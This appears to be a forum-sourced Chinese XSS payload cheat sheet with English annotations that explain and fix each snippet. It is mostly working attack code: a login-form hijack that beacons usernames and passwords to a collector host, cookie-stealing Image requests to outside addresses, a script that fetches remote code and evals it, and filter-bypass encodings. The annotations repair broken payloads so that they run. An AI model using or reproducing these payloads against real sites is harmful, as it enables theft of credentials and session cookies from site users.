http://xss.betaslife.com/viewthread.php?tid=2

1.最短的动态插入JS（依赖 IE 专有的 CSS expression()，IE8 标准模式起已移除，现代浏览器不会执行）.
代码:
<!--
  IE-only: CSS expression() runs script from a style value; it was dropped in IE8
  standards mode, so this is a legacy-browser payload. The /**/ is used where a
  space would normally separate the tag name from the style attribute. The
  expression appends a <script> element to the document and points its src at
  xss.js (resolved relative to the current page).
  NOTE(review): IE re-evaluates expression() repeatedly, so this presumably appends
  many script elements, not one - confirm if it matters for the target.
-->
<x/**/style=xss:expression(document.appendChild(document.createElement('script')).src='xss.js')>

2.获取表单密码（劫持名为 login 的表单的 onsubmit，用 Image 信标把输入值发往攻击者主机，再正常提交表单）.
代码:
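// After page load, replace the submit handler of the form named 'login'. On submit,
// a throwaway Image whose src carries the entered username and password makes the
// browser issue a GET to the collector host, then the form is submitted normally so
// the victim sees nothing unusual. 127.0.0.1 is presumably a placeholder for the
// collector; this.username / this.password assume controls with those names.
// Fix: the original concatenated the values straight onto "loveshell.php" with no
// "?" separator, producing a malformed request path instead of a query string.
// Caveats: the values are not URL-encoded ("&", "#", spaces would corrupt the
// query), and the navigation triggered by submit() may abort the beacon request
// before it completes - NOTE(review): confirm in the target browser.
window.onload=function(){document.forms['login'].onsubmit=function(){var a=new Image();a.src="http://127.0.0.1/loveshell.php?"+this.username.value+"&"+this.password.value;this.submit();}};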
代码:
// Attach a click handler to the control named "login" inside the first form on the
// page. alert(/xss/) is the canary; the RegExp literal avoids quote characters.
document.forms[0].elements.login.onclick = function () {
  alert(/xss/);
};

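// Replace the submit handler of the form named 'login' with a canary alert.
// Fix: the original ended in "}};", one closing brace too many, which is a
// SyntaxError when pasted on its own. The extra brace presumably belonged to the
// window.onload wrapper of snippet 2 above, where this line was taken from.
document.forms['login'].onsubmit=function(){alert(/xss/)};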

3.转码（编码绕过：用 String.fromCharCode / unescape 在运行时还原被过滤的关键字，再交给 eval 执行）.
代码:
// Encoding demo: String.fromCharCode(88,83,83) rebuilds the string "XSS" at runtime,
// so the literal never appears in the injected source. As written, eval() then
// evaluates the bare identifier XSS (a ReferenceError unless something defines it);
// a working payload would encode a complete expression the same way.
eval(String.fromCharCode(88,83,83))

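// Encoding demo: unescape() turns %28 / %29 back into "(" and ")", so "alert(" never
// appears literally in the payload. Fix: the original passed the bare token
// alert%28/xss/%29 to unescape(), which is a SyntaxError - the encoded text must be
// a string literal. unescape() is deprecated; decodeURIComponent() decodes this
// input identically.
eval(unescape('alert%28/xss/%29'))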

4.获取COOKIE（document.cookie 只能读到未设置 HttpOnly 的 cookie；用 Image 请求把它带出）
代码:
// Cookie exfiltration: a throwaway Image whose src carries document.cookie as the
// c= query parameter; the browser issues the GET without ever displaying an image.
// Only cookies without the HttpOnly flag are visible to document.cookie, and the
// value is not URL-encoded, so ';' and spaces in the cookie string travel raw.
c = new Image;
c.src = 'http://xss/cookie.php?c=' + document.cookie;
//不允许空格的情况（用 /**/ 注释代替 new 与 Image 之间的空格）
代码:
// Same cookie beacon for injection points that reject spaces: the /**/ comment
// separates "new" from "Image" where a space would have been filtered.
// Only non-HttpOnly cookies are readable; the value is sent without URL-encoding.
i=new/**/Image();i.src='http://192.168.3.10/cookie.php?c='+document.cookie;

5.AJAX EVAL CODE（仅限 IE 的 ActiveXObject；请求受同源策略限制，存放 payload 的页面必须能从受害站点取到）
代码:
// IE-only: ActiveXObject('Microsoft.XMLHTTP') is the legacy XMLHttpRequest. The
// capitalised a.Open presumably relies on case-insensitive COM dispatch -
// NOTE(review): confirm on the target IE version. The third argument `false` makes
// the GET synchronous, so responseText is available right after send(). The body
// fetched from the blog URL is expected to hold the payload between the literal
// markers '--|' and '|--'; that slice is unescape()d and eval()ed. The request is
// subject to the same-origin policy, so the payload page must be reachable from
// the vulnerable origin.
a=new ActiveXObject('Microsoft.XMLHTTP');a.Open('get','http://xss-poc.blog.sohu.com/31406970.html',false);a.send();b=a.responseText;eval(unescape(b.substring(b.indexOf('--|')+3,b.indexOf('|--'))));

6.DOM EVAL CODE（payload 事先放在页面正文的 '+++' 与 '---' 之间，再从 innerHTML 取出执行）

代码:
// Reads the serialised page body and eval()s whatever sits between the literal
// markers '+++' and '---' (s points just past '+++', e at '---'), after
// unescape(). This lets a stored payload live in ordinary page text instead of in
// the injection point itself.
// Caveats: if either marker is missing, indexOf returns -1, so s becomes 2 and
// substring(2,-1) behaves as substring(0,2) - the first two characters of the
// body get eval()ed. NOTE(review): innerHTML serialises text with entities
// (&lt;, &amp;), so the stored payload must avoid characters that serialise as
// entities or unescape() will not recover them - confirm for the target page.
t=document.body.innerHTML;s=t.indexOf('+++')+3;e=t.indexOf('---');eval(unescape(t.substring(s,e)));

7.最短XSS（实际上是用 /**/ 注释代替空格的拆分字符串写法：z='ale'+"rt"+"()" 拼成 alert() 再 eval，用来绕过过滤空白字符或 "alert" 关键字的过滤器）
代码:
<script>/**/z='ale'/**/+"rt"/**/+"()";/**/eval(z)/**/</script>

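<script>/*
  Multi-line variant of the payload above: z='ale'+"rt"+"()" is assembled and
  eval()ed as alert(), with every line break placed inside a block comment so the
  statement is joined by comments rather than by whitespace (presumably aimed at
  filters that work on line-oriented or whitespace-separated input - confirm
  against the target filter).
*/z='ale'/*
*/+"rt"/*
*/+"()";/*
*/eval(z)/*
*/</script>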